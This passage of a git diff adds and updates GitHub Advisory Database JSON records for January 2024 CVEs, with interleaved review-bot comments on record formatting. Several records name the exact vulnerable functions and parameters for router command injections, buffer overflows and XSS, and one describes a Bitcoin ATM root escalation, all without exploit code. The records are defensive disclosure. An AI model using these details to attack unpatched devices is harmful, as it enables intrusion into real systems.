"modified": "2024-01-25T21:32:15Z", + "modified": "2024-01-29T18:31:48Z", "published": "2024-01-25T21:32:15Z", "aliases": [ "CVE-2024-22639" ], "details": "iGalerie v3.0.22 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Titre (Title) field in the editing interface.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T21:15:09Z" 
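Review bot: GHSA-4gfv-m8hr-53f2 is a new record for a CVE whose `details` text states the candidate was withdrawn by its CNA, yet nothing structured in the record marks it as withdrawn: `severity` and `cwe_ids` are empty and no OSV `withdrawn` timestamp is set. Consumers that filter on `withdrawn` will treat this as a live advisory and surface a non-issue. If the database has a convention for rejected CVEs, applying it here (e.g. a `"withdrawn": "<rfc3339-timestamp-placeholder>"` entry, or not importing rejected candidates at all) would be clearer than relying on readers to parse the prose. GHSA-4gx8-mxrj-5rc3 on the next line (CVE-2023-45930) has exactly the same shape.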
diff --git a/advisories/unreviewed/2024/01/GHSA-4gx8-mxrj-5rc3/GHSA-4gx8-mxrj-5rc3.json b/advisories/unreviewed/2024/01/GHSA-4gx8-mxrj-5rc3/GHSA-4gx8-mxrj-5rc3.json new file mode 100644 index 0000000000000..36b69997c62b1 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-4gx8-mxrj-5rc3/GHSA-4gx8-mxrj-5rc3.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4gx8-mxrj-5rc3", + "modified": "2024-01-30T06:30:23Z", + "published": "2024-01-30T06:30:23Z", + "aliases": [ + "CVE-2023-45930" + ], + "details": "Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45930" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T06:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4h85-vpxq-834q/GHSA-4h85-vpxq-834q.json b/advisories/unreviewed/2024/01/GHSA-4h85-vpxq-834q/GHSA-4h85-vpxq-834q.json new file mode 100644 index 0000000000000..f8735ca6fc6d6 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-4h85-vpxq-834q/GHSA-4h85-vpxq-834q.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4h85-vpxq-834q", + "modified": "2024-01-29T12:30:20Z", + "published": "2024-01-29T12:30:20Z", + "aliases": [ + "CVE-2024-23792" + ], + "details": "When adding attachments to ticket comments, \nanother user can add attachments as well impersonating the orginal user. The attack requires a \nlogged-in other user to know the UUID. While the legitimate user \ncompletes the comment, the malicious user can add more files to the \ncomment.\n\nThis issue affects OTRS: from 7.0.X through 7.0.48, from 8.0.X through 8.0.37, from 2023.X through 2023.1.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23792" + }, + { + "type": "WEB", + "url": "https://otrs.com/release-notes/otrs-security-advisory-2024-03/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4hh7-5c39-pfhw/GHSA-4hh7-5c39-pfhw.json b/advisories/unreviewed/2024/01/GHSA-4hh7-5c39-pfhw/GHSA-4hh7-5c39-pfhw.json index 43126d49c6dad..9839c6aed876d 100644 --- a/advisories/unreviewed/2024/01/GHSA-4hh7-5c39-pfhw/GHSA-4hh7-5c39-pfhw.json +++ b/advisories/unreviewed/2024/01/GHSA-4hh7-5c39-pfhw/GHSA-4hh7-5c39-pfhw.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-4hh7-5c39-pfhw", - "modified": "2024-01-22T21:31:07Z", + "modified": "2024-01-29T18:31:47Z", "published": "2024-01-22T21:31:07Z", "aliases": [ "CVE-2023-24135" ], "details": "Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a command injection vulnerability in the function formWriteFacMac. This vulnerability allows attackers to execute arbitrary commands via manipulation of the mac parameter.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,9 +40,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-77" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-22T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-4j85-8vqx-f8qv/GHSA-4j85-8vqx-f8qv.json b/advisories/unreviewed/2024/01/GHSA-4j85-8vqx-f8qv/GHSA-4j85-8vqx-f8qv.json index 1b4d9e884f20c..79b9c738d755a 100644 --- a/advisories/unreviewed/2024/01/GHSA-4j85-8vqx-f8qv/GHSA-4j85-8vqx-f8qv.json +++ b/advisories/unreviewed/2024/01/GHSA-4j85-8vqx-f8qv/GHSA-4j85-8vqx-f8qv.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20965" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0003/" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0006/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git a/advisories/unreviewed/2024/01/GHSA-4jhj-g9wr-f89q/GHSA-4jhj-g9wr-f89q.json b/advisories/unreviewed/2024/01/GHSA-4jhj-g9wr-f89q/GHSA-4jhj-g9wr-f89q.json index f3e59993c556d..8f4085ddef5b8 100644 --- a/advisories/unreviewed/2024/01/GHSA-4jhj-g9wr-f89q/GHSA-4jhj-g9wr-f89q.json +++ b/advisories/unreviewed/2024/01/GHSA-4jhj-g9wr-f89q/GHSA-4jhj-g9wr-f89q.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-4jhj-g9wr-f89q", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-29T18:31:48Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-52328" ], "details": "Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers.\n\nPlease note this vulnerability is similar, but not identical to CVE-2023-52329.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-4mwf-4888-4x35/GHSA-4mwf-4888-4x35.json b/advisories/unreviewed/2024/01/GHSA-4mwf-4888-4x35/GHSA-4mwf-4888-4x35.json index 9a2cf54464331..1ace89e379607 100644 --- a/advisories/unreviewed/2024/01/GHSA-4mwf-4888-4x35/GHSA-4mwf-4888-4x35.json +++ b/advisories/unreviewed/2024/01/GHSA-4mwf-4888-4x35/GHSA-4mwf-4888-4x35.json 
@@ -36,6 +36,46 @@ { "type": "WEB", "url": "https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1031" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/30/10" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/30/3" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/30/4" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/30/5" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/30/9" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/31/2" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/31/3" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/02/6" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/02/9" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/03/1" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-4pwh-g75g-82fx/GHSA-4pwh-g75g-82fx.json b/advisories/unreviewed/2024/01/GHSA-4pwh-g75g-82fx/GHSA-4pwh-g75g-82fx.json new file mode 100644 index 0000000000000..108a14de9e218 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-4pwh-g75g-82fx/GHSA-4pwh-g75g-82fx.json 
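Review bot: All ten openwall references added to GHSA-4mwf-4888-4x35 use the `http://` scheme, while the existing references in the file (the openeuler.org entry immediately above, for instance) are `https://`. Presumably these are passed through verbatim from the NVD reference list; if the importer is free to normalise, `https://www.openwall.com/lists/oss-security/...` keeps the document consistent and avoids a cleartext fetch for tooling that follows references. This is a consistency nit rather than a correctness problem.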
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4pwh-g75g-82fx", + "modified": "2024-02-06T15:32:04Z", + "published": "2024-01-31T18:31:27Z", + "aliases": [ + "CVE-2024-22286" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Aluka BA Plus – Before & After Image Slider FREE allows Reflected XSS.This issue affects BA Plus – Before & After Image Slider FREE: from n/a through 1.0.3.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22286" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/ba-plus-before-after-image-slider-free/wordpress-ba-plus-plugin-1-0-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T18:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4q7q-5p3p-5fcj/GHSA-4q7q-5p3p-5fcj.json b/advisories/unreviewed/2024/01/GHSA-4q7q-5p3p-5fcj/GHSA-4q7q-5p3p-5fcj.json new file mode 100644 index 0000000000000..dafb250b8b03e --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-4q7q-5p3p-5fcj/GHSA-4q7q-5p3p-5fcj.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4q7q-5p3p-5fcj", + "modified": "2024-02-01T06:31:05Z", + "published": "2024-01-30T15:30:23Z", + "aliases": [ + "CVE-2024-24328" + ], + "details": "TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setMacFilterRules function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24328" + }, + { + "type": "WEB", + "url": "https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/12/TOTOlink%20A3300R%20setMacFilterRules.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4q7q-6wxm-5v68/GHSA-4q7q-6wxm-5v68.json b/advisories/unreviewed/2024/01/GHSA-4q7q-6wxm-5v68/GHSA-4q7q-6wxm-5v68.json index 557589f79d1f4..1c7f4394fdc9d 100644 --- a/advisories/unreviewed/2024/01/GHSA-4q7q-6wxm-5v68/GHSA-4q7q-6wxm-5v68.json +++ b/advisories/unreviewed/2024/01/GHSA-4q7q-6wxm-5v68/GHSA-4q7q-6wxm-5v68.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-4q7q-6wxm-5v68", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-31T18:31:23Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-42143" ], "details": "Missing Integrity Check in Shelly TRV 20220811-152343/v2.1.8@5afc928c allows malicious users to create a backdoor by redirecting the device to an attacker-controlled machine which serves the manipulated firmware file. The device is updated with the manipulated firmware.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ 
@@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-354" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T20:15:45Z" diff --git a/advisories/unreviewed/2024/01/GHSA-4q9c-68c7-fxff/GHSA-4q9c-68c7-fxff.json b/advisories/unreviewed/2024/01/GHSA-4q9c-68c7-fxff/GHSA-4q9c-68c7-fxff.json new file mode 100644 index 0000000000000..324120bdd3791 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-4q9c-68c7-fxff/GHSA-4q9c-68c7-fxff.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4q9c-68c7-fxff", + "modified": "2024-02-01T06:31:05Z", + "published": "2024-01-30T15:30:23Z", + "aliases": [ + "CVE-2024-24327" + ], + "details": "TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the pppoePass parameter in the setIpv6Cfg function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24327" + }, + { + "type": "WEB", + "url": "https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/7/TOTOlink%20A3300R%20setIpv6Cfg.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4qcw-hfhw-j23m/GHSA-4qcw-hfhw-j23m.json b/advisories/unreviewed/2024/01/GHSA-4qcw-hfhw-j23m/GHSA-4qcw-hfhw-j23m.json new file mode 100644 index 0000000000000..8170ce400493e --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-4qcw-hfhw-j23m/GHSA-4qcw-hfhw-j23m.json 
@@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4qcw-hfhw-j23m", + "modified": "2024-01-29T03:30:18Z", + "published": "2024-01-29T03:30:18Z", + "aliases": [ + "CVE-2024-0996" + ], + "details": "A vulnerability classified as critical has been found in Tenda i9 1.0.0.9(4122). This affects the function formSetCfm of the file /goform/setcfm of the component httpd. The manipulation of the argument funcpara1 leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252261 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0996" + }, + { + "type": "WEB", + "url": "https://jylsec.notion.site/Tenda-i9-has-stack-buffer-overflow-vulnerability-in-formSetCfm-c1bd9745c81e4207aceeaa1ba5e10563?pvs=4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252261" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252261" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121", + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T03:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4vvr-gjmg-w366/GHSA-4vvr-gjmg-w366.json b/advisories/unreviewed/2024/01/GHSA-4vvr-gjmg-w366/GHSA-4vvr-gjmg-w366.json new file mode 100644 index 0000000000000..a2819fc7cda36 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-4vvr-gjmg-w366/GHSA-4vvr-gjmg-w366.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4vvr-gjmg-w366", + "modified": "2024-01-31T18:31:27Z", + "published": "2024-01-31T18:31:27Z", + "aliases": [ + "CVE-2024-22297" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Codeboxr CBX Map for Google Map & OpenStreetMap allows Stored XSS.This issue affects CBX Map for Google Map & OpenStreetMap: from n/a through 1.1.11.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22297" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/cbxgooglemap/wordpress-cbx-map-for-google-map-openstreetmap-plugin-1-1-11-cross-site-scripting-xss-vulnerability-2?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T18:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4vwj-x32h-m4vj/GHSA-4vwj-x32h-m4vj.json b/advisories/unreviewed/2024/01/GHSA-4vwj-x32h-m4vj/GHSA-4vwj-x32h-m4vj.json index adc9e44463e24..2daac5f23ec8c 100644 --- a/advisories/unreviewed/2024/01/GHSA-4vwj-x32h-m4vj/GHSA-4vwj-x32h-m4vj.json +++ b/advisories/unreviewed/2024/01/GHSA-4vwj-x32h-m4vj/GHSA-4vwj-x32h-m4vj.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4vwj-x32h-m4vj", - "modified": "2024-01-25T18:30:51Z", + "modified": "2024-02-08T15:30:26Z", "published": "2024-01-25T18:30:51Z", "aliases": [ "CVE-2024-0822" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0822" }, + { + "type": "WEB", + "url": "https://github.com/oVirt/ovirt-engine/pull/914" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2024-0822" 
@@ -32,7 +36,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-1390" + "CWE-1390", + "CWE-287" ], "severity": "CRITICAL", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-4wm4-8487-w6cr/GHSA-4wm4-8487-w6cr.json b/advisories/unreviewed/2024/01/GHSA-4wm4-8487-w6cr/GHSA-4wm4-8487-w6cr.json new file mode 100644 index 0000000000000..a29d050bd2fed --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-4wm4-8487-w6cr/GHSA-4wm4-8487-w6cr.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4wm4-8487-w6cr", + "modified": "2024-01-29T18:31:53Z", + "published": "2024-01-29T18:31:53Z", + "aliases": [ + "CVE-2024-1016" + ], + "details": "A vulnerability was found in Solar FTP Server 2.1.1/2.1.2. It has been declared as problematic. This vulnerability affects unknown code of the component PASV Command Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-252286 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1016" + }, + { + "type": "WEB", + "url": "https://packetstormsecurity.com/files/176675/Solar-FTP-Server-2.1.2-Denial-Of-Service.html" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252286" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252286" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T18:15:07Z" + } +} \ No newline at end of file 
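Review bot: The reference `https://github.com/oVirt/ovirt-engine/pull/914` added to GHSA-4vwj-x32h-m4vj in the preceding hunk is typed `WEB`; if that pull request is the fix for CVE-2024-0822, OSV's `FIX` reference type is more specific and lets tooling distinguish the patch from the vendor advisory links that follow it. If the unreviewed importer always types non-NVD links as `WEB`, this can wait until the record goes through review.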
diff --git a/advisories/unreviewed/2024/01/GHSA-4x9c-j993-gcjj/GHSA-4x9c-j993-gcjj.json b/advisories/unreviewed/2024/01/GHSA-4x9c-j993-gcjj/GHSA-4x9c-j993-gcjj.json index 313c6d5076cc1..4d8ec865a4322 100644 --- a/advisories/unreviewed/2024/01/GHSA-4x9c-j993-gcjj/GHSA-4x9c-j993-gcjj.json +++ b/advisories/unreviewed/2024/01/GHSA-4x9c-j993-gcjj/GHSA-4x9c-j993-gcjj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-4x9c-j993-gcjj", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-31T18:31:23Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2023-31654" ], "details": "Redis raft master-1b8bd86 to master-7b46079 was discovered to contain an ODR violation via the component hiredisAllocFns at /opt/fs/redisraft/deps/hiredis/alloc.c.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T22:15:16Z" diff --git a/advisories/unreviewed/2024/01/GHSA-54p6-86fq-2pg8/GHSA-54p6-86fq-2pg8.json b/advisories/unreviewed/2024/01/GHSA-54p6-86fq-2pg8/GHSA-54p6-86fq-2pg8.json new file mode 100644 index 0000000000000..0fd930e295dff --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-54p6-86fq-2pg8/GHSA-54p6-86fq-2pg8.json 
@@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-54p6-86fq-2pg8", + "modified": "2024-01-30T15:30:22Z", + "published": "2024-01-30T15:30:22Z", + "aliases": [ + "CVE-2024-0674" + ], + "details": "Privilege escalation vulnerability in Lamassu Bitcoin ATM Douro machines, in its 7.1 version, which could allow a local user to acquire root permissions by modifying the updatescript.js, inserting special code inside the script and creating the done.txt file. This would cause the watchdog process to run as root and execute the payload stored in the updatescript.js.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0674" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269", + "CWE-281" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-54pg-h955-7f6w/GHSA-54pg-h955-7f6w.json b/advisories/unreviewed/2024/01/GHSA-54pg-h955-7f6w/GHSA-54pg-h955-7f6w.json new file mode 100644 index 0000000000000..17859e204d4a5 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-54pg-h955-7f6w/GHSA-54pg-h955-7f6w.json 
@@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-54pg-h955-7f6w", + "modified": "2024-01-29T03:30:18Z", + "published": "2024-01-29T03:30:18Z", + "aliases": [ + "CVE-2024-0992" + ], + "details": "A vulnerability was found in Tenda i6 1.0.0.9(3857) and classified as critical. This issue affects the function formwrlSSIDset of the file /goform/wifiSSIDset of the component httpd. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252257 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0992" + }, + { + "type": "WEB", + "url": "https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formwrlSSIDset-f0e8be2eb0614e03a60160b48f8527f5?pvs=4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252257" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252257" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121", + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-554m-v42f-hcq9/GHSA-554m-v42f-hcq9.json b/advisories/unreviewed/2024/01/GHSA-554m-v42f-hcq9/GHSA-554m-v42f-hcq9.json new file mode 100644 index 0000000000000..01b341acad305 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-554m-v42f-hcq9/GHSA-554m-v42f-hcq9.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-554m-v42f-hcq9", + "modified": "2024-01-31T15:30:20Z", + "published": "2024-01-31T15:30:20Z", + "aliases": [ + "CVE-2023-5992" + ], + "details": "A vulnerability was found in OpenSC where PKCS#1 encryption padding removal is not implemented as side-channel resistant. This issue may result in the potential leak of private data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5992" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-5992" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2248685" + }, + { + "type": "WEB", + "url": "https://github.com/OpenSC/OpenSC/wiki/CVE-2023-5992" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T14:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-555g-cg2q-wmc3/GHSA-555g-cg2q-wmc3.json b/advisories/unreviewed/2024/01/GHSA-555g-cg2q-wmc3/GHSA-555g-cg2q-wmc3.json new file mode 100644 index 0000000000000..7388d61cc2130 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-555g-cg2q-wmc3/GHSA-555g-cg2q-wmc3.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-555g-cg2q-wmc3", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2023-51840" + ], + "details": "DoraCMS 2.1.8 is vulnerable to Use of Hard-coded Cryptographic Key.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51840" + }, + { + "type": "WEB", + "url": "https://github.com/doramart/DoraCMS/issues/262" + }, + { + "type": "WEB", + "url": "https://github.com/doramart/DoraCMS" + }, + { + "type": "WEB", + "url": "https://github.com/tianjk99/Cryptographic-Misuses/blob/main/CVE-2023-51840.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-798" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": 